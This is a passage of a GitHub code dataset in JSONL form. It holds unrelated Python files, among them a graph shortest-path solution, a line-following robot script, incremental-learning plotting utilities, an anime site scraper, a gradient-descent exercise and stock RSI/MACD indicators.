range(m)]\nbuildings = [[0 for _ in range(n)] for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n if i != j:\n buildings[i][j] = 987654321\n\nfor u, v, b in roads:\n buildings[u - 1][v - 1] = 0\n buildings[v - 1][u - 1] = int(b == 0)\n\nfor k in range(n):\n for i in range(n):\n for j in range(n):\n buildings[i][j] = min(buildings[i][j], buildings[i][k] + buildings[k][j])\n\nk = int(sys.stdin.readline())\nfor _ in range(k):\n s, e = map(int, sys.stdin.readline().split())\n print(buildings[s-1][e-1])\n","repo_name":"DKU-STUDY/Algorithm","sub_path":"BOJ/11562.백양로 브레이크/6047198844.py","file_name":"6047198844.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"63"} +{"seq_id":"1141226074","text":"import cv2\nimport numpy as np\nimport serial\nimport time\n\ncap = cv2.VideoCapture(0)\nser = serial.Serial('COM3', 9600, timeout=1)\n\nwhile True:\n ret, frame = cap.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n M = cv2.moments(c)\n\n if M['m00'] != 0:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n if cx < 320:\n # Turn left\n error = 320 - cx\n speed = int(abs(error) / 3)\n ser.write(bytes([0x01, 0x00, speed]))\n else:\n # Turn right\n error = cx - 320\n speed = int(abs(error) / 3)\n ser.write(bytes([0x02, 0x00, speed]))\n else:\n # Line lost, stop\n ser.write(bytes([0x00, 0x00, 0x00]))\n\n cv2.drawContours(frame, contours, -1, (0, 255, 0), 3)\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nser.close()\ncap.release()\ncv2.destroyAllWindows()","repo_name":"RedCloud79/linetrace_arduino","sub_path":"cam_line_test1.py","file_name":"cam_line_test1.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43142095141","text":"import glob\nimport json\nimport math\nimport os\nimport statistics\n\nimport matplotlib.pyplot as plt\n\n\ndef get_template_results(args):\n return {\"config\": args, \"results\": []}\n\n\ndef get_save_folder(model, date, label):\n year_month, day = date[:6], date[6:]\n week_number = math.ceil(int(day) / 7)\n\n folder_path = os.path.join(\n \"results\", \"dev\", model, year_month, \"week_{}\".format(week_number),\n \"{}_{}\".format(date, label)\n )\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n return folder_path\n\n\ndef save_results(results, label, model, date, run_id, seed):\n del results[\"config\"][\"device\"]\n\n folder_path = get_save_folder(model, date, label)\n\n file_path = \"run_{}_.json\".format(seed)\n\n with open(os.path.join(folder_path, file_path), \"w+\") as f:\n try:\n json.dump(results, f, indent=2)\n except Exception:\n print(\"Failed to dump exps on json file.\")\n\n\ndef extract(paths, metric=\"avg_inc\", nb_classes=None):\n \"\"\"Extract accuracy logged in the various log files.\n\n :param paths: A path or a list of paths to a json file.\n :param avg_inc: Boolean specifying whether to use the accuracy or the average\n incremental accuracy as defined in iCaRL.\n :return: A list of runs. Each runs is a list of (average incremental) accuracies.\n \"\"\"\n if not isinstance(paths, list):\n paths = [paths]\n\n score_plot, score_tab = [], []\n for path in paths:\n with open(path) as f:\n data = json.load(f)\n\n if metric in (\"avg_inc\", \"accuracy\"):\n score_plot.append([100 * task[\"accuracy\"][\"total\"] for task in data[\"results\"]])\n elif metric == \"accuracy_top5\":\n score_plot.append([100 * task[\"accuracy_top5\"][\"total\"] for task in data[\"results\"]])\n elif metric == \"old_accuracy\":\n score_plot.append([100 * task.get(\"old_accuracy\", 0.) for task in data[\"results\"]])\n elif metric == \"new_accuracy\":\n score_plot.append([100 * task.get(\"new_accuracy\", 0.) for task in data[\"results\"]])\n elif metric == \"unseen\":\n score_plot.append(\n [100 * task.get(\"unseen_classes_accuracy\", 0.) for task in data[\"results\"]]\n )\n elif metric == \"seen\":\n score_plot.append(\n [100 * task.get(\"seen_classes_accuracy\", 0.) for task in data[\"results\"]]\n )\n else:\n raise ValueError(\"bouh\")\n\n if metric in (\"avg_inc\", \"accuracy\", \"accuracy_top5\", \"old_accuracy\", \"new_accuracy\"):\n score_tab.append(score_plot[-1])\n elif metric == \"avg_cls\":\n accs = []\n for class_id in range(nb_classes):\n class_accuracies = [\n 100 * task[\"accuracy_per_class\"][\"{:02d}-{:02d}\".format(class_id, class_id)]\n for task in data[\"results\"]\n if \"{:02d}-{:02d}\".format(class_id, class_id) in task[\"accuracy_per_class\"]\n ]\n if len(class_accuracies) > 0:\n accs.append(statistics.mean(class_accuracies))\n\n score_tab.append(accs)\n\n return score_plot, score_tab\n\n\ndef compute_avg_inc_acc(results):\n \"\"\"Computes the average incremental accuracy as defined in iCaRL.\n\n The average incremental accuracies at task X are the average of accuracies\n at task 0, 1, ..., and X.\n\n :param accs: A list of dict for per-class accuracy at each step.\n :return: A float.\n \"\"\"\n tasks_accuracy = [r[\"total\"] for r in results]\n return sum(tasks_accuracy) / len(tasks_accuracy)\n\n\ndef aggregate(runs_accs):\n \"\"\"Aggregate results of several runs into means & standard deviations.\n\n :param runs_accs: A list of runs. Each runs is a list of (average\n incremental) accuracies.\n :return: A list of means, and a list of standard deviations.\n \"\"\"\n means = []\n stds = []\n\n n_runs = len(runs_accs)\n for i in range(len(runs_accs[0])):\n ith_value = [runs_accs[j][i] for j in range(n_runs)]\n\n mean = sum(ith_value) / n_runs\n std = math.sqrt(sum(math.pow(mean - i, 2) for i in ith_value) / n_runs)\n\n means.append(mean)\n stds.append(std)\n\n return means, stds\n\n\ndef compute_unique_score(runs_accs, skip_first=False, first_n_steps=None):\n \"\"\"Computes the average of the (average incremental) accuracies to get a\n unique score.\n\n :param runs_accs: A list of runs. Each runs is a list of (average\n incremental) accuracies.\n :param skip_first: Whether to skip the first task accuracy as advised in\n End-to-End Incremental Accuracy.\n :return: A unique score being the average of the (average incremental)\n accuracies, and a standard deviation.\n \"\"\"\n start = int(skip_first)\n\n means = []\n for run in runs_accs:\n if first_n_steps:\n means.append(sum(run[start:first_n_steps]) / len(run[start:first_n_steps]))\n else:\n means.append(sum(run[start:]) / len(run[start:]))\n\n mean_of_mean = sum(means) / len(means)\n if len(runs_accs) == 1: # One run, probably a paper, don't compute std:\n std = \"\"\n else:\n std = math.sqrt(sum(math.pow(mean_of_mean - i, 2) for i in means) / len(means))\n std = \" ± \" + str(round(std, 2))\n\n return str(round(mean_of_mean, 2)), std\n\n\ndef get_max_label_length(results):\n return max(len(r.get(\"label\", r[\"path\"])) for r in results)\n\n\ndef plot(\n results,\n increment,\n total,\n initial_increment=None,\n x_ticks=None,\n title=\"\",\n path_to_save=None,\n max_acc=100,\n min_acc=0,\n first_n_steps=None,\n figsize=(10, 5),\n metric=\"avg_inc\",\n zeroshot=False,\n ylabel=\"Accuracy over seen classes\"\n):\n \"\"\"Plotting utilities to visualize several experiments.\n\n :param results: A list of dict composed of a \"path\", a \"label\", an optional\n \"average incremental\", an optional \"skip_first\".\n :param increment: The increment of classes per task.\n :param total: The total number of classes.\n :param initial_increment: Increment initial, default to 0.\n :param title: Plot title.\n :param path_to_save: Optional path where to save the image.\n \"\"\"\n plt.figure(figsize=figsize)\n\n initial_increment = initial_increment or increment\n x = list(range(initial_increment, total + 1, increment))\n\n for result in results:\n path = result.get(\"path\", \"\")\n label = result.get(\"label\", path.rstrip(\"/\").split(\"/\")[-1])\n skip_first = result.get(\"skip_first\", False)\n kwargs = result.get(\"kwargs\", {})\n\n if result.get(\"hidden\", False):\n continue\n\n if path:\n if \"*\" in path:\n path = glob.glob(path)\n elif os.path.isdir(path):\n path = glob.glob(os.path.join(path, \"*.json\"))\n\n score_plot, score_tab = extract(path, metric=metric, nb_classes=total)\n else:\n score_plot = result[\"runs_accs\"]\n score_tab = score_plot\n\n means, stds = aggregate(score_plot)\n\n if first_n_steps is not None:\n x, means, stds = x[:first_n_steps], means[:first_n_steps], stds[:first_n_steps]\n\n unique_score, unique_std = compute_unique_score(\n score_tab, skip_first=skip_first, first_n_steps=first_n_steps\n )\n\n label = \"{label} ({avg})\".format(\n label=label, avg=unique_score + unique_std, last=round(means[-1], 2)\n )\n\n try:\n bar = plt.errorbar(x, means, stds, label=label, marker=\"o\", markersize=3, **kwargs)\n except Exception:\n print(x)\n print(means)\n print(stds)\n print(label)\n raise\n\n if zeroshot:\n unseen_accs, _ = extract(path, \"unseen\", nb_classes=total)\n plt.plot(\n x[:-1], unseen_accs[0][:-1], linestyle='dashed', color=bar.lines[0].get_color()\n )\n seen_accs, _ = extract(path, \"seen\", nb_classes=total)\n plt.plot(x, seen_accs[0], linestyle='dotted', color=bar.lines[0].get_color())\n\n plt.legend(loc=\"upper right\")\n plt.xlabel(\"Number of classes\")\n plt.ylabel(ylabel)\n plt.title(title)\n\n for y in range(min_acc, max_acc + 1, 10):\n plt.axhline(y=y, color='black', linestyle='dashed', linewidth=1, alpha=0.2)\n plt.yticks(list(range(min_acc, max_acc + 1, 10)))\n\n x_ticks = x_ticks or increment\n plt.xticks(list(range(initial_increment, total + 1, x_ticks)))\n\n if path_to_save:\n os.makedirs(os.path.dirname(path_to_save), exist_ok=True)\n plt.savefig(path_to_save)\n plt.show()\n","repo_name":"arthurdouillard/incremental_learning.pytorch","sub_path":"inclearn/lib/results_utils.py","file_name":"results_utils.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"63"} +{"seq_id":"17466295468","text":"from nose.tools import istest, assert_equals, assert_in\nimport subprocess\nfrom subprocess import STDOUT, PIPE, check_output, call, Popen\nfrom .assert_equals_with_unidiff import assert_equals_with_unidiff as assert_equals\nfrom textwrap import dedent\n\nfrom pprint import pprint\nimport sys\n\nclass TestScriptsSmoke:\n def test_trash_rm_works(self):\n self.run_script('trash-rm')\n assert_in(\"Usage:\", self.stderr.splitlines())\n\n def test_trash_put_works(self):\n self.run_script('trash-put')\n assert_in(\"Usage: trash-put [OPTION]... FILE...\",\n self.stderr.splitlines())\n\n def test_trash_put_touch_filesystem(self):\n self.run_script('trash-put', 'non-existent')\n assert_equals(\"trash-put: cannot trash non existent 'non-existent'\\n\",\n self.stderr)\n\n def run_script(self, script, *args):\n process = Popen([sys.executable, script] + list(args),\n env={'PYTHONPATH':'.'},\n stdin=None,\n stdout=PIPE,\n stderr=PIPE)\n\n (self.stdout, self.stderr) = process.communicate()\n self.stderr = self.stderr.decode('utf-8')\n process.wait()\n self.returncode = process.returncode\n\n\n","repo_name":"hooray1998/dotfiles","sub_path":"binary/trash-cli/integration_tests/test_trash_rm_script.py","file_name":"test_trash_rm_script.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"11054567489","text":"import os\nimport sys\nfrom pathlib import Path\n\ndirectory = Path(sys.argv[1]).resolve()\n\nfiles = sorted(((file, directory / (file.stem + \".pdf\"))\n for file in directory.iterdir()\n if file.suffix == \".md\"), key=lambda x: x[0].stat().st_mtime_ns, reverse=True)\n\nprint(f\"Compiling: {len(files)}\")\nfor input, output in files:\n print(f\"\\t{input}\")\n os.system(f'pandoc \"{input}\" -o \"{output}\"')\nprint(\"Done!\")\n","repo_name":"TWoolhouse/Slook","sub_path":"report/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72134311562","text":"import sqlite3\nfrom flask import g\n\n\nclass TableProvider:\n def __init__(self, db_path):\n self.db_path = db_path\n\n def query(self, sql):\n db = self.__get_db()\n rows = db.execute(sql)\n rows = [dict(row) for row in rows]\n columns = rows[0].keys()\n columns = [{'headerName': column, 'field': column} for column in columns]\n return (columns, rows)\n\n def __get_db(self):\n if 'db' not in g:\n g.db = sqlite3.connect(\n self.db_path,\n detect_types=sqlite3.PARSE_DECLTYPES\n )\n g.db.row_factory = sqlite3.Row\n return g.db\n\n def teardown(self, error=None):\n db = g.pop('db', None)\n if db is not None:\n db.close()\n","repo_name":"mobikitinc/analyst","sub_path":"demos/dact/backend/table_provider.py","file_name":"table_provider.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"21714356761","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport string\nimport urllib.request\nimport mechanize\nimport pandas as pd\nimport demjson\n\nfrom percache import Cache\nfrom urllib.parse import urlencode, urlparse, urlunparse, quote_plus\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\n\nfrom shikimori.models import AnimeVideo\n\nfrom parsers import ongoings\nfrom parsers import parser, misc, tools\nfrom parsers.parser import MEDIA_KIND_VIDEOS, MEDIA_KIND_TORRENTS\nDATE_FORMAT = parser.DATE_FORMAT\n\nclass AnilibriaParser(parser.Parser):\n\theaders = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.1144'}\n\n\turl_to_embed = lambda self, url: self.build_url(path = url.replace(\"]//\", \"]https://\"))\n\tget_quality = lambda self, url: (\"%dp\" % max([int(i.split(\"[\")[-1].split(\"]\")[0][:-1]) for i in url.split(\",\")]))\n\tname_match_threshold = 93\n\n\tsupported_media_kinds = [MEDIA_KIND_VIDEOS]\n\n\tdef __init__(self, query_parameter = \"search\", fetch_latest_episode = True):\n\t\tself.scheme = \"https\"\n\t\tself.netloc = \"www.anilibria.tv\"\n\t\tself.fetch_latest_episode = fetch_latest_episode\n\t\tpath = \"/public/search.php\"\n\t\turl = urllib.parse.urlunparse((self.scheme, self.netloc, path, None, None, None))\n\t\tmain_url = urllib.parse.urlunparse((self.scheme, self.netloc, \"\", None, None, None))\n\t\tquery_kwargs = {query_parameter: \"%s\"}\n\n\t\tsuper().__init__(url = url, main_url = main_url, headers = self.headers, query_kwargs = query_kwargs, query_parameter = query_parameter)\n\t\tself.setup_urlopener()\n\n\tdef _find_best_match(self, resp, anime_names):\n\t\tpage = BeautifulSoup(resp, features = \"html5lib\")\n\t\turls = page.find_all(\"a\")\n\t\tif not urls:\n\t\t\treturn\n\n\t\tresults = {a.find(\"span\").text: a.get(\"href\") for a in urls}\n\t\tprint(results)\n\t\tbest_score = 0\n\t\tbest_result = None\n\t\tprint(\"_find_best_match: names: %s\" % str(anime_names))\n\n\t\tfor name in anime_names:\n\t\t\tprint(\"_find_best_match: name: %s\" % name)\n\n\t\t\tfor k, v in results.items():\n\t\t\t\tscore = fuzz.ratio(name, k)\n\t\t\t\tprint(\"%s: name: %s, score=%d\" % (name, k, score))\n\t\t\t\tif score > best_score:\n\t\t\t\t\tbest_score = score\n\t\t\t\t\tbest_result = v\n\t\t\t\t\tprint(\"%s: score=%d\" % (best_result, best_score))\n\n\t\tif not best_result:\n\t\t\treturn\n\n\t\tif best_score < self.name_match_threshold:\n\t\t\tprint(\"%s has score %d, rejecting\" % (str(best_result), best_score))\n\t\t\tbest_result = None\n\n\t\treturn best_result\n\tdef search_anime(self, anime_english, anime_aliases = [], type_ = \"\"):\n\t\tnames = [anime_english]\n\t\tres = []\n\t\tanime_page_url = \"\"\n\t\t#print(\"%s aliases = %s\" % (anime_english, misc.FORCE_ALIASES[\"anilibria\"][anime_english]))\n\n\t\tif anime_english in misc.FORCE_ALIASES[\"anilibria\"]:\n\t\t\tfor a in misc.FORCE_ALIASES[\"anilibria\"][anime_english]:\n\t\t\t\tif not a.endswith(\".html\"):\n\t\t\t\t\tnames += [a]\n\t\t\t\telse:\n\t\t\t\t\tprint(\"release = %s\" % a)\n\t\t\t\t\tanime_page_url = a\n\n\t\t#print(anime_page_url)\n\n\t\tfound = (anime_page_url != \"\")\n\t\tif anime_page_url:\n\t\t\ttry:\n\t\t\t\t#print(anime_page_url)\n\t\t\t\tres = self.browser_open(self.build_url(path = anime_page_url))\n\t\t\texcept RuntimeError:\n\t\t\t\ttools.catch()\n\n\t\t\ttry:\n\t\t\t\tpage_name = \"%s.html\" % names[0]\n\t\t\t\tpage_data = res.get_data()\n\t\t\t\tself.save_page(page_name, page_data)\n\n\t\t\t\treturn page_data\n\t\t\texcept:\n\t\t\t\ttools.catch()\n\n\t\tprint(\"anilibria: search_anime: anime_english=%s, anime_aliases=%s, names=%s\" % (anime_english, str(anime_aliases), str(names)))\n\t\tfor anime_name in names:\n\t\t\tpage_name = \"%s.html\" % anime_name\n\t\t\tpage_data = self.load_page(page_name)\n\t\t\tprint(anime_name)\n\t\t\tif not page_data:\n\t\t\t\tprint(\"!page_data\")\n\t\t\t\ttry:\n\t\t\t\t\tbuilt_url, query_kwargs = self.build_search_url(anime_name, method = \"POST\")\n\t\t\t\t\tres = self.browser_open(built_url, method = \"POST\", data = query_kwargs)\n\t\t\t\texcept RuntimeError:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\t\t\t\tresp = res.read()\n\n\t\t\t\tif not resp:\n\t\t\t\t\tself.save_page(page_name, b\"\")\n\t\t\t\t\tprint(\"!resp\")\n\t\t\t\t\tcontinue\n\n\t\t\t\ttry:\n\t\t\t\t\tresp = demjson.decode(resp)\n\t\t\t\texcept:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not \"err\" in resp or not \"mes\" in resp or resp[\"err\"] != \"ok\":\n\t\t\t\t\tprint(\"resp is not ok\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tresp_data = resp[\"mes\"]\n\t\t\t\tif not resp_data and not anime_page_url:\n\t\t\t\t\tprint(\"!resp_data\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not anime_page_url:\n\t\t\t\t\tanime_page_url = self._find_best_match(resp_data, anime_names = anime_aliases)\n\n\t\t\t\tprint(\"search: anime_page_url=%s\" % anime_page_url)\n\t\t\t\tif not anime_page_url:\n\t\t\t\t\tprint(\"!anime_page_url\")\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\t#print(anime_page_url)\n\t\t\t\t\tres = self.browser_open(self.build_url(path = anime_page_url))\n\t\t\t\texcept RuntimeError:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\n\t\t\tfound = True\n\t\t\tbreak\n\n\t\tif not found:\n\t\t\treturn None\n\n\t\ttry:\n\t\t\tif (not page_data) and res:\n\t\t\t\tpage_data = res.get_data()\n\t\t\t\tself.save_page(page_name, page_data)\n\t\texcept:\n\t\t\ttools.catch()\n\t\t\treturn None\n\n\t\treturn page_data\n\n\t@Cache(prefix=\"AnilibriaParser\")\n\tdef parse_anime_page(self, anime_english, type_ = \"\"):\n\t\tanime_page = self.search_anime(anime_english, type_)\n\t\tif not anime_page:\n\t\t\tprint(\"parse_anime_page: not found\")\n\t\t\treturn self.handler_anime_not_found(anime_english)\n\n\t\tcontent_main = BeautifulSoup(anime_page, features = \"html5lib\")\n\t\t\n\t\tauthors = \"[Anilibria]\"\n\t\trelease_info = content_main.find(\"div\", {\"id\": \"xreleaseInfo\"})\n\t\tif release_info:\n\t\t\trelease_info = list(release_info.strings)\n\t\t\tif 'Озвучка:' in release_info:\n\t\t\t\ttry:\n\t\t\t\t\tdubbers = release_info[release_info.index('Озвучка:') + 1].lstrip()\n\t\t\t\t\tdubbers = \" & \".join(dubbers.split(\", \"))\n\t\t\t\t\tauthors += \"(%s)\" % dubbers\n\n\t\t\t\texcept IndexError:\n\t\t\t\t\ttools.catch()\n\t\t\n\n\t\tvideos = {}\n\t\tvideos_start_idx = anime_page.find(b\"new Playerjs(\")\n\t\tif videos_start_idx < 0:\n\t\t\treturn authors, videos\n\n\t\tvideos_end_idx = anime_page.find(b\"});\", videos_start_idx)\n\n\t\tif videos_end_idx < 0:\n\t\t\treturn authors, videos\n\n\t\tvideos_unparsed = anime_page[videos_start_idx + len(b\"new Playerjs(\"): videos_end_idx + 1]\n\n\t\ttry:\n\t\t\tvideos = {int(f[\"id\"].split(\"s\")[-1]): f[\"file\"] for f in demjson.decode(videos_unparsed)[\"file\"]}\n\t\texcept:\n\t\t\ttools.catch()\n\n\t\treturn authors, videos\n\n\n\t@Cache(prefix=\"AnilibriaParser\")\n\tdef get_videos_list(self, anime_english, episode_num, type_ = \"\"):\n\t\texisting_video = AnimeVideo.query.filter(AnimeVideo.anime_english == anime_english, AnimeVideo.episode == episode_num, AnimeVideo.url.like(\"%libria%\")).first()\n\t\tif existing_video:\n\t\t\treturn self.handler_epidode_exists(anime_english, episode_num, existing_video.url)\n\n\t\ttry:\n\t\t\tobj = self.parse_anime_page(anime_english, type_)\n\t\t\tauthors, videos = obj\n\t\texcept:\n\t\t\t#print(\"parse_anime_page returned %s\" % str(obj))\n\t\t\traise\n\n\t\tif not episode_num in videos:\n\t\t\treturn self.handler_epidode_not_found(anime_english, episode_num)\n\n\t\tif not authors:\n\t\t\treturn self.handler_authors_not_found(anime_english)\n\n\t\tvideos_list = pd.DataFrame(columns = [\"url\", \"episode\", \"kind\", \"quality\", \"video_hosting\", \"language\", \"author\"])\n\n\t\tvideo_url = videos[episode_num]\n\t\tquality = \"unknown\"\n\t\ttry:\n\t\t\tquality = self.get_quality(video_url)\n\t\texcept:\n\t\t\ttools.catch()\n\n\t\tvideos_list = videos_list.append({\n\t\t\t\"url\": self.url_to_embed(video_url),\n\t\t\t\"episode\": str(episode_num),\n\t\t\t\"video_hosting\": self.netloc,\n\t\t\t\"author\": authors,\n\t\t\t\"quality\": quality,\n\t\t\t\"language\": \"russian\",\n\t\t\t\"kind\": self.to_db_kind[\"fandub\"]\n\t\t}, ignore_index = True)\n\n\t\treturn videos_list\n","repo_name":"PlayShikiApp/parsers","sub_path":"anilibria.py","file_name":"anilibria.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"11446683410","text":"#!/usr/bin/env python\nimport argparse\nimport html\nimport json\nimport sys\n\nimport pandas as pd\n\nfrom lqam.annotations import QUESTIONS_PER_HIT\nfrom lqam.util.argparse_with_defaults import ArgumentParserWithDefaults\nfrom lqam.util.file_utils import cached_path\nfrom lqam.util.iterable_utils import chunks\n\n\ndef parse_args() -> argparse.Namespace:\n parser = ArgumentParserWithDefaults()\n parser.add_argument(\"questions_path_or_url\", metavar=\"QUESTIONS_JSON_FILE_OR_URL\", nargs=\"?\", default=\"-\")\n parser.add_argument(\"--questions-per-hit\", type=int, default=QUESTIONS_PER_HIT)\n args = parser.parse_args()\n\n args.input = sys.stdin if args.questions_path_or_url == \"-\" else cached_path(args.questions_path_or_url)\n\n return args\n\n\ndef main() -> None:\n args = parse_args()\n\n with open(args.questions_path_or_url) as file:\n instances = json.load(file)\n\n hits_df = pd.DataFrame([\n {\n k: v\n for i, instance in enumerate(hit_instances, start=1)\n for k, v in [(f\"video{i}_id\", instance[\"video_id\"]),\n (f\"video{i}_start_time\", instance[\"video_start_time\"]),\n (f\"video{i}_end_time\", instance[\"video_end_time\"]),\n # We escape the HTML because it could have quotes and so break the JS or HTML code and the\n # page not work at all:\n (f\"question{i}\", html.escape(instance[\"masked_caption\"])),\n (f\"label{i}\", instance[\"label\"])]\n }\n for hit_instances in chunks(instances, args.questions_per_hit)\n ])\n\n print(hits_df.to_csv(index=False), end=\"\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MichiganNLP/video-fill-in-the-blank","sub_path":"scripts/generate_annotation_input.py","file_name":"generate_annotation_input.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"6206603759","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef function(x1, x2):\n return 3/2*x1*x1 + 3/2*x2*x2 + x1*x2 + x1 + 2*x2 +2\n\ndef dfx1(x1, x2):\n return 3*x1 + x2 + 1\n\ndef dfx2(x1, x2):\n return 3*x2 + x1 + 2\n\ndef dx1(gamma,xd_old,a,g):\n return gamma * xd_old[0] -(1-gamma)*a*g[0]\n\ndef dx2(gamma,xd_old,a,g):\n return gamma * xd_old[1] -(1-gamma)*a*g[1]\n\n\ndef Main():\n g=[0,0]\n dx=[0,0]\n x_new=[0,0]\n a=0.5\n gamma=0.1\n h=1.5\n r=0.5\n z=0.04\n\n #Create vector x for x0 = 0.5\n x = [-2 ,-1.5]\n xd_old=[0,0]\n\n for i in range(2):\n\n fx=function(x[0],x[1])\n\n g[0]=dfx1(x[0],x[1])\n g[1]=dfx2(x[0],x[1])\n\n dx[0]=dx1(gamma,xd_old,a,g)\n dx[1]=dx2(gamma,xd_old,a,g)\n\n x_new[0]=x[0]+dx[0]\n x_new[1]=x[1]+dx[1]\n\n fx_new=function(x_new[0],x_new[1])\n print(fx_new)\n \n if fx_new > fx * z:\n x_new=x\n a=r*a\n gamma=0\n elif fx_new < fx:\n x=x_new\n a=n*a\n gamma=0.1\n else :\n x=x_new\n gamma=0.1\n \n xd_old=dx\n\n print (f\"x{i} = {x}\")\n fig = plt.figure(figsize=(6,5))\n left, bottom, width, height = 0.1, 0.1, 0.8, 0.8\n ax = fig.add_axes([left, bottom, width, height]) \n\n start, stop, n_values = -8, 8, 800\n\n x_vals = np.linspace(start, stop, n_values)\n y_vals = np.linspace(start, stop, n_values)\n X, Y = np.meshgrid(x_vals, y_vals)\n\n\n Z = 3/2*X*X + 3/2*Y*Y + X*Y + X + 2*Y +2\n\n cp = plt.contourf(X, Y, Z)\n plt.colorbar(cp)\n\n ax.set_title('Contour Plot')\n ax.set_xlabel('x (cm)')\n ax.set_ylabel('y (cm)')\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n Main()\n","repo_name":"kostaskon7/ML-Neural-Network","sub_path":"hw2_2546_2631/code/ask8.py","file_name":"ask8.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29238876028","text":"import yfinance as yf\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport tqdm\r\n\r\n## Classes and Functions\r\n\r\nclass StockRSI():\r\n '''Relative strength index'''\r\n def __init__(self, name, period):\r\n self.stock = StockInfo(name, period)\r\n self.hist = self.stock.hist\r\n self.get_RSI()\r\n\r\n def get_RSI(self, N=14):\r\n self.rsi_df = pd.DataFrame()\r\n self.rsi_df['change'] = [0]*len(self.hist['Close'])\r\n\r\n self.rsi_df['change'] = (self.hist['Close'] - self.hist['Close'].shift(1)).values\r\n self.rsi_df = pd.concat((self.rsi_df[self.rsi_df>0], self.rsi_df[self.rsi_df<0]), axis=1).fillna(0).abs()\r\n self.rsi_df.columns = ['gain', 'loss']\r\n self.rsi_df[['avg gain', 'avg loss']] = np.zeros((len(self.rsi_df), 2))\r\n\r\n self.rsi_df['avg gain'][:N] = self.rsi_df['gain'].iloc[:N].mean()\r\n self.rsi_df['avg loss'][:N] = abs(self.rsi_df['loss'].iloc[:N].mean())\r\n\r\n for i, (idx, row) in enumerate(self.rsi_df.iloc[N:].iterrows(), N):\r\n self.rsi_df['avg gain'][i] = ((self.rsi_df.iloc[i-1]['avg gain']*(N-1)) + self.rsi_df.iloc[i]['gain'])/N\r\n self.rsi_df['avg loss'][i] = abs(((self.rsi_df.iloc[i-1]['avg loss']*(N-1)) + self.rsi_df.iloc[i]['loss'])/N)\r\n\r\n self.rsi_df['RS'] = self.rsi_df['avg gain'] / self.rsi_df['avg loss']\r\n self.rsi_df['RSI'] = 100 - (100 / (1 + self.rsi_df['RS']))\r\n\r\n return self.rsi_df\r\n\r\n def plot_RSI(self):\r\n plt.plot(self.hist.index, self.rsi_df['RSI'])\r\n plt.xticks(rotation=45)\r\n plt.axhline(40, c='k', linestyle='--')\r\n plt.axhline(70, c='k', linestyle='--')\r\n plt.show()\r\n\r\n\r\n\r\nclass StockInfo():\r\n ''' Get stock info and EMA values'''\r\n def __init__(self, name, period='5y'):\r\n self.name = name\r\n self.stock = yf.Ticker(name)\r\n self.hist = self.stock.history(period=period)\r\n \r\n def get_ema(self, N, series):\r\n k = 2/(N+1)\r\n ema = np.ones(series.shape)*series.mean()\r\n ema[:N] = series.values[:N].mean()\r\n for i, _ in enumerate(series.iloc[N:], N):\r\n ema[i] = (series.iloc[i]*k) + (ema[i-1] * (1-k))\r\n return ema\r\n\r\n def plot(self, series):\r\n for N in [8, 50, 200]:\r\n col_name = 'ema_' + str(N)\r\n self.hist[col_name] = self.get_ema(N, series)\r\n self.hist[col_name].plot()\r\n series.plot()\r\n plt.legend()\r\n plt.show()\r\n\r\n def buy_hold_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n buy_hold_ret = (self.hist['Close'][-1] - self.hist['Close'][0])*num_stocks\r\n percnt_return = (buy_hold_ret/invest_val)*100\r\n print('\\nGains from the Buy-Hold strategy: {}, with %: {} \\n'.format(buy_hold_ret, percnt_return))\r\n return buy_hold_ret, percnt_return\r\n\r\n \r\nclass MACD():\r\n def __init__(self, name, period, fast=12, slow=26, smooth=9):\r\n self.name = name\r\n self.fast = fast\r\n self.slow = slow\r\n self.smooth = smooth\r\n self.stock = StockInfo(name, period)\r\n self.hist = self.stock.hist\r\n self.stock_rsi = 